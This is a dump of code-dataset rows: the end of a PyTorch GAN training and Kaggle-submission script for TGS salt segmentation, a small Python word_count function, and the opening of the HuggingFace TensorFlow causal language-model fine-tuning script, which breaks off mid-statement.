        os.mkdir(os.path.join(args.results_dir, args.exper_name))
    if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "valid") ):
        os.mkdir(os.path.join(args.results_dir, args.exper_name, "valid"))
    if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "valid", "images") ):
        os.mkdir(os.path.join(args.results_dir, args.exper_name, "valid", "images"))
    if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "valid", "masks") ):
        os.mkdir(os.path.join(args.results_dir, args.exper_name, "valid", "masks"))
    if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "test") ):
        os.mkdir(os.path.join(args.results_dir, args.exper_name, "test"))
    if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "test", "images") ):
        os.mkdir(os.path.join(args.results_dir, args.exper_name, "test", "images"))
    if not os.path.isdir( os.path.join(args.results_dir, args.exper_name, "test", "masks") ):
        os.mkdir(os.path.join(args.results_dir, args.exper_name, "test", "masks"))
    if( args.train_mode in ["train"] ):
        if not( os.path.exists(args.save_checkpoints_dir) ):
            os.mkdir(args.save_checkpoints_dir)
        if not( os.path.exists(os.path.join(args.save_checkpoints_dir, args.exper_name)) ):
            os.mkdir( os.path.join(args.save_checkpoints_dir, args.exper_name) )
    # Suppress warnings
    warnings.simplefilter('ignore', DeprecationWarning)
    # Select the execution device (GPU if requested and available).
    if( args.device == "gpu" ):
        use_cuda = torch.cuda.is_available()
        if( use_cuda == True ):
            device = torch.device( "cuda" )
            #torch.cuda.set_device(args.gpu_ids[0])
            print( "実行デバイス :", device)
            print( "GPU名 :", torch.cuda.get_device_name(device))
            print("torch.cuda.current_device() =", torch.cuda.current_device())
        else:
            print( "can't using gpu." )
            device = torch.device( "cpu" )
            print( "実行デバイス :", device)
    else:
        device = torch.device( "cpu" )
        print( "実行デバイス :", device)
    # Fix random seeds for reproducibility.
    if( args.use_cuda_deterministic ):
        torch.backends.cudnn.deterministic = True
        torch.backends.cudnn.benchmark = False
    np.random.seed(args.seed)
    random.seed(args.seed)
    torch.manual_seed(args.seed)
    torch.cuda.manual_seed(args.seed)
    torch.cuda.manual_seed_all(args.seed)
    # TensorBoard writers for visualization (train mode only).
    if( args.train_mode == "train" ):
        board_train = SummaryWriter( log_dir = os.path.join(args.tensorboard_dir, args.exper_name) )
        board_test = SummaryWriter( log_dir = os.path.join(args.tensorboard_dir, args.exper_name + "_test") )
#================================
# データセットの読み込み
#================================
df_submission = pd.read_csv( os.path.join(args.dataset_dir, "sample_submission.csv" ) )
# 学習用データセットとテスト用データセットの設定
ds_train = TGSSaltDataset( args, args.dataset_dir, datamode = "train", data_augument = args.data_augument, debug = args.debug )
ds_test = TGSSaltDataset( args, args.dataset_dir, datamode = "test", data_augument = False, debug = args.debug )
#dloader_train = TGSSaltDataLoader(ds_train, batch_size=args.batch_size, shuffle=True, n_workers=args.n_workers )
#dloader_test = TGSSaltDataLoader(ds_test, batch_size=args.batch_size_test, shuffle=False, n_workers=args.n_workers )
dloader_train = torch.utils.data.DataLoader(ds_train, batch_size=args.batch_size, shuffle=True, num_workers = args.n_workers, pin_memory = True )
dloader_test = torch.utils.data.DataLoader(ds_test, batch_size=args.batch_size_test, shuffle=False, num_workers = args.n_workers, pin_memory = True )
"""
X_train_img, y_train_mask, X_test_img, X_train_depth, X_test_depth, train_image_names, test_image_names \
= load_dataset(
dataset_dir = args.dataset_dir,
image_height_org = args.image_height, image_width_org = args.image_width_org,
image_height = args.image_height, image_width = args.image_width, n_channels = args.n_channels,
n_samplings = args.n_samplings,
debug = args.debug,
)
y_pred_train = np.zeros( y_train_mask.shape )
if( args.debug ):
print( "X_train_img.shape : ", X_train_img.shape )
print( "y_train_mask.shape : ", y_train_mask.shape )
print( "X_test_img.shape : ", X_test_img.shape )
print( "X_train_depth.shape : ", X_train_depth.shape )
print( "X_test_depth.shape : ", X_test_depth.shape )
"""
# 可視化
"""
max_images = 60
grid_width = 15
grid_height = int(max_images / grid_width)
fig, axs = plt.subplots(grid_height, grid_width, figsize=(grid_width, grid_height))
for idx in range(max_images):
img = X_train_img[idx] # 0.0f ~ 1.0f
mask = y_train_mask[idx] # 0.0f ~ 1.0f
ax = axs[int(idx / grid_width), idx % grid_width]
ax.imshow(img.squeeze(), cmap="Greys")
ax.imshow(mask.squeeze(), alpha=0.3, cmap="Greens")
ax.set_yticklabels([])
ax.set_xticklabels([])
plt.suptitle("images and masks [train]\nGreen: salt")
plt.savefig( os.path.join(args.results_dir, args.exper_name, "images_and_masks_train.png"), dpi = 300, bbox_inches = 'tight' )
"""
#================================
# 前処理
#================================
"""
# データセットの分割
X_train_img, X_valid_img, y_train_mask, y_valid_mask, train_image_names, image_names_valid, X_train_depth, X_valid_depth \
= train_test_split( X_train_img, y_train_mask, train_image_names, X_train_depth, test_size=args.val_rate, random_state=args.seed )
if( args.debug ):
print( "X_train_img.shape : ", X_train_img.shape )
print( "X_valid_img.shape : ", X_valid_img.shape )
print( "y_train_mask.shape : ", y_train_mask.shape )
print( "y_valid_mask.shape : ", y_valid_mask.shape )
print( "X_train_depth.shape : ", X_train_depth.shape )
print( "X_valid_depth.shape : ", X_valid_depth.shape )
"""
    #================================
    # Define the model architectures
    #================================
    # Generator: when --depth is set, the depth scalar is concatenated as
    # an extra input channel (handled per-batch in the training loop).
    if( args.model_type_G == "unet4" ):
        if( args.depth ):
            model_G = UNet4( n_in_channels = args.n_channels + 1, n_out_channels = args.n_channels, n_fmaps = 32,).to( device )
        else:
            model_G = UNet4( n_in_channels = args.n_channels, n_out_channels = args.n_channels, n_fmaps = 32,).to( device )
    elif( args.model_type_G == "unet4bottleneck" ):
        model_G = UNet4BottleNeck( n_in_channels = args.n_channels, n_out_channels = args.n_channels, n_fmaps = 32,).to( device )
    elif( args.model_type_G == "mgvton" ):
        if( args.depth ):
            model_G = MGVTONResGenerator( input_nc = args.n_channels + 1, output_nc = args.n_channels, padding_type='zero', affine=False ).to( device )
        else:
            model_G = MGVTONResGenerator( input_nc = args.n_channels, output_nc = args.n_channels, padding_type='zero', affine=False ).to( device )
        #model_G = MGVTONResGenerator( input_nc = args.n_channels, output_nc = args.n_channels, padding_type='reflect', affine=True ).to( device )
    elif( args.model_type_G == "ganimation" ):
        if( args.depth ):
            model_G = GANimationGenerator( input_nc = args.n_channels + 1, output_nc = args.n_channels, conv_dim = 32 ).to( device )
        else:
            model_G = GANimationGenerator( input_nc = args.n_channels, output_nc = args.n_channels, conv_dim = 32 ).to( device )
    # Discriminator
    # NOTE(review): uses .cuda() while the generator uses .to(device);
    # this will fail when --device cpu is selected — verify intent.
    if( args.model_type_D == "patchgan" ):
        model_D = PatchGANDiscriminator( n_in_channels = args.n_channels, n_fmaps = 32 ).cuda()
    elif( args.model_type_D == "multiscale" ):
        model_D = MultiscaleDiscriminator( n_in_channels = args.n_channels, n_fmaps = 32, n_dis = 3 ).cuda()
    elif( args.model_type_D == "ganimation" ):
        model_D = GANimationDiscriminator( n_in_channels = args.n_channels, n_fmaps = 32, feat_dim = 1 ).cuda()
    if( args.debug ):
        print( "model_G :\n", model_G )
        print( "model_D :\n", model_D )
    # Load pretrained weights when checkpoint paths were given.
    if not args.load_checkpoints_path_G == '' and os.path.exists(args.load_checkpoints_path_G):
        load_checkpoint(model_G, device, args.load_checkpoints_path_G )
    if not args.load_checkpoints_path_D == '' and os.path.exists(args.load_checkpoints_path_D):
        load_checkpoint(model_D, device, args.load_checkpoints_path_D )
    #================================
    # Configure the optimizers
    #================================
    optimizer_G = optim.Adam(
        params = model_G.parameters(),
        lr = args.lr, betas = (args.beta1,args.beta2)
    )
    optimizer_D = optim.Adam(
        params = model_D.parameters(),
        lr = args.lr, betas = (args.beta1,args.beta2)
    )
    #================================
    # Configure the loss functions
    #================================
    loss_l1_fn = nn.L1Loss()
    loss_vgg_fn = VGGLoss(device)
    loss_entropy_fn = ParsingCrossEntropyLoss()
    loss_bce_fn = nn.BCEWithLogitsLoss()
    if( args.adv_loss_type == "vanilla" ):
        loss_adv_fn = VanillaGANLoss()
    elif( args.adv_loss_type == "lsgan" ):
        loss_adv_fn = LSGANLoss()
    elif( args.adv_loss_type == "hinge" ):
        loss_adv_fn = HingeGANLoss()
    else:
        loss_adv_fn = LSGANLoss()
    if( args.model_type_D == "ganimation" ):
        loss_cond_fn = ConditionalExpressionLoss()
    #================================
    # Train the model
    #================================
    if( args.train_mode == "train" ):
        print("Starting Training Loop...")
        n_print = 1
        step = 0
        for epoch in tqdm( range(args.n_epoches), desc = "Epoches" ):
            # Fetch one minibatch at a time from the DataLoader.
            # NOTE(review): `iter` shadows the builtin of the same name.
            for iter, inputs in enumerate( tqdm( dloader_train, desc = "minbatch iters" ) ):
                model_G.train()
                model_D.train()
                # Skip the final minibatch when it is smaller than
                # batch_size (it would cause shape mismatches below).
                if inputs["image"].shape[0] != args.batch_size:
                    break
                # Move the minibatch data to the device.
                image_name = inputs["image_name"]
                image = inputs["image"].to(device)
                mask = inputs["mask"].to(device)
                depth = inputs["depth"].to(device)
                if( args.debug and n_print > 0):
                    print( "image.shape : ", image.shape )
                    print( "mask.shape : ", mask.shape )
                    print( "depth.shape : ", depth.shape )
                #====================================================
                # Training step
                #====================================================
                #----------------------------------------------------
                # Generator forward pass
                #----------------------------------------------------
                # Feed the training data through the generator.
                if( args.model_type_G in ["unet4bottleneck"] ):
                    output = model_G( image, depth )
                else:
                    if( args.depth ):
                        depth = depth.expand(depth.shape[0], depth.shape[1], image.shape[2], image.shape[3] )
                        concat = torch.cat( [image, depth], dim=1)
                        output = model_G( concat )
                    else:
                        output = model_G( image )
                if( args.debug and n_print > 0 ):
                    print( "output.shape :", output.shape )
                #----------------------------------------------------
                # Discriminator update
                #----------------------------------------------------
                # Re-enable gradient computation for the discriminator D.
                for param in model_D.parameters():
                    param.requires_grad = True
                # Feed the data through the discriminator.
                # NOTE(review): d_real is computed from the generated
                # `output`, not the ground-truth `mask` — the
                # discriminator never sees a real sample. Looks like a
                # bug; verify against the intended GAN formulation.
                if( args.model_type_D == "ganimation" ):
                    d_real, d_real_depth = model_D( output )
                    d_fake, d_fake_depth = model_D( output.detach() )
                    if( args.debug and n_print > 0 ):
                        print( "d_real.shape :", d_real.shape )
                        print( "d_fake.shape :", d_fake.shape )
                        print( "d_real_depth.shape :", d_real_depth.shape )
                        print( "d_fake_depth.shape :", d_fake_depth.shape )
                else:
                    d_real = model_D( output )
                    d_fake = model_D( output.detach() )
                    if( args.debug and n_print > 0 ):
                        print( "d_real.shape :", d_real.shape )
                        print( "d_fake.shape :", d_fake.shape )
                # Compute the discriminator losses.
                loss_D, loss_D_real, loss_D_fake = loss_adv_fn.forward_D( d_real, d_fake )
                if( args.model_type_D == "ganimation" ):
                    loss_D_cond_depth = loss_cond_fn( d_real_depth, depth[:,:,0,0] ) + loss_cond_fn( d_fake_depth, depth[:,:,0,0] )
                    loss_D = loss_D + args.lambda_cond * loss_D_cond_depth
                # Update the discriminator parameters.
                optimizer_D.zero_grad()
                loss_D.backward(retain_graph=True)
                optimizer_D.step()
                # Freeze the discriminator D again for the generator step.
                for param in model_D.parameters():
                    param.requires_grad = False
                #----------------------------------------------------
                # Generator update
                #----------------------------------------------------
                # Compute the generator losses.
                loss_l1 = loss_l1_fn( output, mask )
                if( args.n_channels == 3 ):
                    loss_vgg = loss_vgg_fn( output, mask )
                loss_entropy = loss_entropy_fn( output, mask )
                loss_bce = loss_bce_fn( output, mask )
                loss_adv = loss_adv_fn.forward_G( d_fake )
                if( args.n_channels == 3 ):
                    loss_G = args.lambda_l1 * loss_l1 + args.lambda_vgg * loss_vgg + args.lambda_enpropy * loss_entropy + args.lambda_bce * loss_bce + args.lambda_adv * loss_adv
                else:
                    loss_G = args.lambda_l1 * loss_l1 + args.lambda_enpropy * loss_entropy + args.lambda_bce * loss_bce + args.lambda_adv * loss_adv
                if( args.model_type_D == "ganimation" ):
                    loss_G_cond_depth = loss_cond_fn( d_real_depth, depth[:,:,0,0] ) + loss_cond_fn( d_fake_depth, depth[:,:,0,0] )
                    loss_G = loss_G + args.lambda_cond * loss_G_cond_depth
                # Update the generator parameters.
                optimizer_G.zero_grad()
                loss_G.backward()
                optimizer_G.step()
                #====================================================
                # Log training progress
                #====================================================
                if( step == 0 or ( step % args.n_diaplay_step == 0 ) ):
                    board_train.add_scalar('G/loss_G', loss_G.item(), step)
                    board_train.add_scalar('G/loss_l1', loss_l1.item(), step)
                    if( args.n_channels == 3 ):
                        board_train.add_scalar('G/loss_vgg', loss_vgg.item(), step)
                    board_train.add_scalar('G/loss_entropy', loss_entropy.item(), step)
                    board_train.add_scalar('G/loss_bce', loss_bce.item(), step)
                    board_train.add_scalar('G/loss_adv', loss_adv.item(), step)
                    if( args.model_type_D == "ganimation" ):
                        board_train.add_scalar('G/loss_G_cond_depth', loss_G_cond_depth.item(), step)
                    board_train.add_scalar('D/loss_D', loss_D.item(), step)
                    board_train.add_scalar('D/loss_D_real', loss_D_real.item(), step)
                    board_train.add_scalar('D/loss_D_fake', loss_D_fake.item(), step)
                    if( args.model_type_D == "ganimation" ):
                        board_train.add_scalar('D/loss_D_cond_depth', loss_D_cond_depth.item(), step)
                    if( args.n_channels == 3 ):
                        print( "step={}, loss_G={:.5f}, loss_l1={:.5f}, loss_vgg={:.5f}, loss_entropy={:.5f}, loss_bce={:.5f}, loss_adv={:.5f}".format(step, loss_G, loss_l1, loss_vgg, loss_entropy, loss_bce, loss_adv) )
                        print( "step={}, loss_D={:.5f}, loss_D_real={:.5f}, loss_D_fake={:.5f}".format(step, loss_D.item(), loss_D_real.item(), loss_D_fake.item()) )
                        if( args.model_type_D == "ganimation" ):
                            print( "step={}, loss_G_cond_depth={:.5f}".format(step, loss_G_cond_depth,) )
                            print( "step={}, loss_D_cond_depth={:.5f}".format(step, loss_D_cond_depth,) )
                    else:
                        print( "step={}, loss_G={:.5f}, loss_l1={:.5f}, loss_entropy={:.5f}, loss_bce={:.5f}, loss_adv={:.5f}".format(step, loss_G, loss_l1, loss_entropy, loss_bce, loss_adv) )
                        print( "step={}, loss_D={:.5f}, loss_D_real={:.5f}, loss_D_fake={:.5f}".format(step, loss_D.item(), loss_D_real.item(), loss_D_fake.item()) )
                        if( args.model_type_D == "ganimation" ):
                            print( "step={}, loss_G_cond_depth={:.5f}".format(step, loss_G_cond_depth,) )
                            print( "step={}, loss_D_cond_depth={:.5f}".format(step, loss_D_cond_depth,) )
                    visuals = [
                        [image, mask, output],
                    ]
                    board_add_images(board_train, 'images', visuals, step+1)
                step += 1
                n_print -= 1
            #====================================================
            # Save model checkpoints
            #====================================================
            if( epoch % args.n_save_epoches == 0 ):
                save_checkpoint( model_G, device, os.path.join(args.save_checkpoints_dir, args.exper_name, 'model_ep%03d.pth' % (epoch)) )
                save_checkpoint( model_G, device, os.path.join(args.save_checkpoints_dir, args.exper_name, 'model_final.pth') )
                print( "saved checkpoints" )
        save_checkpoint( model_G, device, os.path.join(args.save_checkpoints_dir, args.exper_name, 'model_final.pth') )
        print("Finished Training Loop.")
    #================================
    # Run inference on the test set
    #================================
    print("Starting Test Loop...")
    n_print = 1
    y_pred_test = []
    test_image_names = []
    model_G.eval()
    for step, inputs in enumerate( tqdm( dloader_test, desc = "Samplings" ) ):
        if inputs["image"].shape[0] != args.batch_size_test:
            break
        image_name = inputs["image_name"]
        test_image_names.append(image_name[0])
        image = inputs["image"].to(device)
        depth = inputs["depth"].to(device)
        # Generator G inference (no gradients needed).
        with torch.no_grad():
            if( args.model_type_G in ["unet4bottleneck"] ):
                output = model_G( image, depth )
            else:
                if( args.depth ):
                    depth = depth.expand(depth.shape[0], depth.shape[1], image.shape[2], image.shape[3] )
                    concat = torch.cat( [image, depth], dim=1)
                    output = model_G( concat )
                else:
                    output = model_G( image )
            y_pred_test.append( output[0].detach().cpu().numpy() )
        if( args.debug and n_print > 0 ):
            print( "output.shape :", output.shape )
            print( "type(output) :", type(output) )
        # Persist the first few prediction images for inspection.
        if( step <= 10 ):
            save_image_w_norm( image, os.path.join( args.results_dir, args.exper_name, "test", "images", image_name[0] ) )
            save_image_w_norm( output, os.path.join( args.results_dir, args.exper_name, "test", "masks", image_name[0] ) )
        if( step >= args.n_samplings ):
            break
        n_print -= 1
    y_pred_test = np.array( y_pred_test )
    print( "type(y_pred_test) : ", type(y_pred_test) )
    print( "y_pred_test.shape : ", y_pred_test.shape )
#================================
# 可視化処理
#================================
# IoU
"""
thresholds = np.linspace(0, 1, 50) # IoU スコアの低い結果を除外するためのスレッショルド
ious = np.array( [iou_metric_batch(y_valid_mask, np.int32(y_pred_train > threshold)) for threshold in thresholds] )
threshold_best_index = np.argmax(ious[9:-10]) + 9
iou_best = ious[threshold_best_index]
threshold_best = thresholds[threshold_best_index] # ?
print( "iou_best = {:0.4f} ".format(iou_best) )
print( "threshold_best = {:0.4f} ".format(threshold_best) )
fig, axs = plt.subplots()
axs.plot(thresholds, ious)
axs.plot(threshold_best, iou_best, "xr", label="Best threshold")
plt.xlabel("Threshold")
plt.ylabel("IoU")
plt.title("Threshold vs IoU ({}, {})".format(threshold_best, iou_best))
plt.grid()
plt.legend()
plt.savefig( os.path.join(args.results_dir, args.exper_name, "IoU.png"), dpi = 300, bbox_inches = 'tight' )
"""
# 元画像と生成マスク画像の重ね合わせ(test)
"""
max_images = 60
grid_width = 15
grid_height = int(max_images / grid_width)
fig, axs = plt.subplots(grid_height, grid_width, figsize=(grid_width, grid_height))
for i, name in enumerate(test_image_names[0:max_images]):
img = X_test_img[i]
mask = np.array(np.round(y_pred_test[i] > threshold_best), dtype=np.float32)
ax = axs[int(i / grid_width), i % grid_width]
ax.imshow(img.squeeze(), cmap="Greys")
ax.imshow(mask.squeeze(), alpha=0.3, cmap="Greens")
ax.set_yticklabels([])
ax.set_xticklabels([])
plt.suptitle("images and masks [test]\nGreen: salt")
plt.savefig( os.path.join(args.results_dir, args.exper_name, "images_and_masks_test.png"), dpi = 300, bbox_inches = 'tight' )
"""
# 元画像と生成マスク画像の重ね合わせ(valid)
"""
max_images = 60
grid_width = 15
grid_height = int(max_images / grid_width)
fig, axs = plt.subplots(grid_height, grid_width, figsize=(grid_width, grid_height))
for i, name in enumerate(image_names_valid[0:max_images]):
img = X_valid_img[i]
mask = y_valid_mask[i]
pred_mask = np.array(np.round(y_pred_train[i] > threshold_best), dtype=np.float32)
ax = axs[int(i / grid_width), i % grid_width]
ax.imshow(img.squeeze(), cmap="Greys")
ax.imshow(mask.squeeze(), alpha=0.3, cmap="Greens")
ax.imshow(pred_mask.squeeze(), alpha=0.3, cmap="OrRd")
ax.set_yticklabels([])
ax.set_xticklabels([])
plt.suptitle("images and masks [train]\nGreen: salt [correct], Red: salt [predict]")
plt.savefig( os.path.join(args.results_dir, args.exper_name, "images_and_masks_valid.png"), dpi = 300, bbox_inches = 'tight' )
"""
    #================================
    # Submit via the Kaggle API
    #================================
    # Resize predictions back to the original image size for the
    # RLE [Run Length Encoding] submission format.
    y_pred_test_org = np.zeros( (len(y_pred_test), args.image_height_org, args.image_width_org), dtype=np.float32 )
    for i in range(len(y_pred_test)):
        y_pred_test_org[i] = cv2.resize( y_pred_test[i,0,:,:].squeeze(), (args.image_height_org, args.image_width_org), interpolation = cv2.INTER_NEAREST )
        #y_pred_test_org[i] = resize( y_pred_test[i,0,:,:].squeeze(), (args.image_height_org, args.image_width_org), mode='constant', preserve_range=True )
    # Fill in the submission data (threshold fixed at 0.0 here).
    y_sub = { name.split(".png")[0] : convert_rle(np.round(y_pred_test_org[i] > 0.0)) for i,name in enumerate(test_image_names) }
    df_submission = pd.DataFrame.from_dict( y_sub, orient='index' )
    df_submission.index.names = ['id']
    df_submission.columns = ['rle_mask']
    df_submission.to_csv( os.path.join(args.results_dir, args.exper_name, args.submit_file) )
    if( args.submit ):
        # Submit with the Kaggle API.
        api = KaggleApi()
        api.authenticate()
        api.competition_submit( os.path.join(args.results_dir, args.exper_name, args.submit_file), args.exper_name, args.competition_id)
        os.system('kaggle competitions submissions -c {}'.format(args.competition_id) )
| [
"y034112@gmail.com"
] | y034112@gmail.com |
baab7d0a2eeef70ff34b1be7b72ce3daea803683 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/word-count/fe23ec94d69343a3a5a10f713adfd463.py | d52d5cd350e7bed379f1fefa4f8f22ad9bfdec49 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 251 | py | # -*-coding: utf-8-*-
#! /usr/bin/env python3
def word_count(string):
    """Return a dict mapping each whitespace-separated word in *string* to its count.

    An empty (or all-whitespace) string yields an empty dict.
    """
    counts = {}
    for word in string.split():
        # dict.get with a default collapses the membership test and the
        # first-occurrence branch of the original into one expression.
        counts[word] = counts.get(word, 0) + 1
    return counts
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
95eaf4108b1e03703c58036d4c2bf1b66f4e0539 | e8a48749014f372633de65d79bfa26a3ad743d89 | /examples/tensorflow/language-modeling/run_clm.py | 46c8d339d970c3d2396d5e090afc7a15e4ea339d | [
"Apache-2.0"
] | permissive | pvcastro/pytorch-pretrained-BERT | 183b7291972c8d8c66c995647df66c1fe439a763 | 49cd736a288a315d741e5c337790effa4c9fa689 | refs/heads/master | 2022-08-19T08:55:16.332585 | 2022-06-30T16:11:08 | 2022-06-30T16:11:08 | 168,367,637 | 1 | 0 | Apache-2.0 | 2019-01-30T15:39:42 | 2019-01-30T15:39:41 | null | UTF-8 | Python | false | false | 23,558 | py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT-2, GPT-Neo...)
on a text file or a dataset without using HuggingFace Trainer.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own clm task. Pointers for this are left as comments.
# region Imports
import logging
import math
import os
import random
import sys
from dataclasses import dataclass, field
from itertools import chain
from pathlib import Path
from typing import Optional
import datasets
import tensorflow as tf
from datasets import load_dataset
from sklearn.model_selection import train_test_split
import transformers
from transformers import (
CONFIG_MAPPING,
CONFIG_NAME,
TF2_WEIGHTS_NAME,
TF_MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoTokenizer,
DefaultDataCollator,
HfArgumentParser,
TFAutoModelForCausalLM,
TFTrainingArguments,
create_optimizer,
set_seed,
)
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
logger = logging.getLogger(__name__)
require_version("datasets>=1.8.0", "To fix: pip install -r examples/tensorflow/language-modeling/requirements.txt")
MODEL_CONFIG_CLASSES = list(TF_MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
# endregion
# region Command-line arguments
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
    """

    model_name_or_path: Optional[str] = field(
        default=None,
        metadata={
            "help": (
                "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
            )
        },
    )
    model_type: Optional[str] = field(
        default=None,
        metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
    )
    config_overrides: Optional[str] = field(
        default=None,
        metadata={
            "help": (
                "Override some existing default config settings when a model is trained from scratch. Example: "
                "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
            )
        },
    )
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    cache_dir: Optional[str] = field(
        default=None,
        metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
    )
    use_fast_tokenizer: bool = field(
        default=True,
        metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
    )
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": (
                "Will use the token generated when running `transformers-cli login` (necessary to use this script "
                "with private models)."
            )
        },
    )

    def __post_init__(self):
        # --config_overrides only makes sense when building a config from scratch,
        # so it is mutually exclusive with an explicit config or checkpoint.
        if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
            raise ValueError(
                "--config_overrides can't be used in combination with --config_name or --model_name_or_path"
            )
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.
    """

    dataset_name: Optional[str] = field(
        default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
    )
    dataset_config_name: Optional[str] = field(
        default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
    )
    train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
    validation_file: Optional[str] = field(
        default=None,
        metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
    )
    validation_split_percentage: Optional[int] = field(
        default=5,
        metadata={
            "help": "The percentage of the train set used as validation set in case there's no validation split"
        },
    )
    block_size: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "Optional input sequence length after tokenization. "
                "The training dataset will be truncated in block of this size for training. "
                "Default to the model max input length for single sentence inputs (take into account special tokens)."
            )
        },
    )
    preprocessing_num_workers: Optional[int] = field(
        default=None,
        metadata={"help": "The number of processes to use for the preprocessing."},
    )
    line_by_line: bool = field(
        default=False,
        metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."},
    )
    max_train_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "For debugging purposes or quicker training, truncate the number of training examples to this "
                "value if set."
            )
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": (
                "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
                "value if set."
            )
        },
    )
    keep_linebreaks: bool = field(
        default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
    )

    def __post_init__(self):
        # At least one data source must be supplied; file-based sources must
        # have an extension the loading code knows how to handle.
        if self.dataset_name is None and self.train_file is None and self.validation_file is None:
            raise ValueError("Need either a dataset name or a training/validation file.")
        else:
            if self.train_file is not None:
                extension = self.train_file.split(".")[-1]
                assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, a json or a txt file."
            if self.validation_file is not None:
                extension = self.validation_file.split(".")[-1]
                assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, a json or a txt file."
# endregion
# region Helper classes
class SavePretrainedCallback(tf.keras.callbacks.Callback):
    """Keras callback that checkpoints the model after every epoch.

    Hugging Face models have a save_pretrained() method that saves both the
    weights and the necessary metadata to allow them to be loaded as a
    pretrained model in future. This is a simple Keras callback that saves the
    model with this method after each epoch.
    """

    def __init__(self, output_dir, **kwargs):
        super().__init__()
        self.output_dir = output_dir

    def on_epoch_end(self, epoch, logs=None):
        # `self.model` is attached by Keras when the callback is registered
        # with Model.fit, so it is available here without being passed in.
        self.model.save_pretrained(self.output_dir)
# endregion
def main():
    """Entry point: parse arguments, build datasets, then train and save a causal LM."""
    # region Argument Parsing
    parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TFTrainingArguments))
    if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
        # If we pass only one argument to the script and it's the path to a json file,
        # let's parse it to get our arguments.
        model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
    else:
        model_args, data_args, training_args = parser.parse_args_into_dataclasses()

    # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
    # information sent is the one passed as arguments along with your Python/PyTorch versions.
    send_example_telemetry("run_clm", model_args, data_args, framework="tensorflow")

    # Sanity checks
    if data_args.dataset_name is None and data_args.train_file is None and data_args.validation_file is None:
        raise ValueError("Need either a dataset name or a training/validation file.")
    else:
        if data_args.train_file is not None:
            extension = data_args.train_file.split(".")[-1]
            assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, json or txt file."
        if data_args.validation_file is not None:
            extension = data_args.validation_file.split(".")[-1]
            assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, json or txt file."

    if training_args.output_dir is not None:
        training_args.output_dir = Path(training_args.output_dir)
        os.makedirs(training_args.output_dir, exist_ok=True)
    # endregion

    # region Checkpoints
    # Detecting last checkpoint.
    checkpoint = None
    if len(os.listdir(training_args.output_dir)) > 0 and not training_args.overwrite_output_dir:
        config_path = training_args.output_dir / CONFIG_NAME
        weights_path = training_args.output_dir / TF2_WEIGHTS_NAME
        if config_path.is_file() and weights_path.is_file():
            checkpoint = training_args.output_dir
            logger.info(
                f"Checkpoint detected, resuming training from checkpoint in {training_args.output_dir}. To avoid this"
                " behavior, change the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
            )
        else:
            raise ValueError(
                f"Output directory ({training_args.output_dir}) already exists and is not empty. "
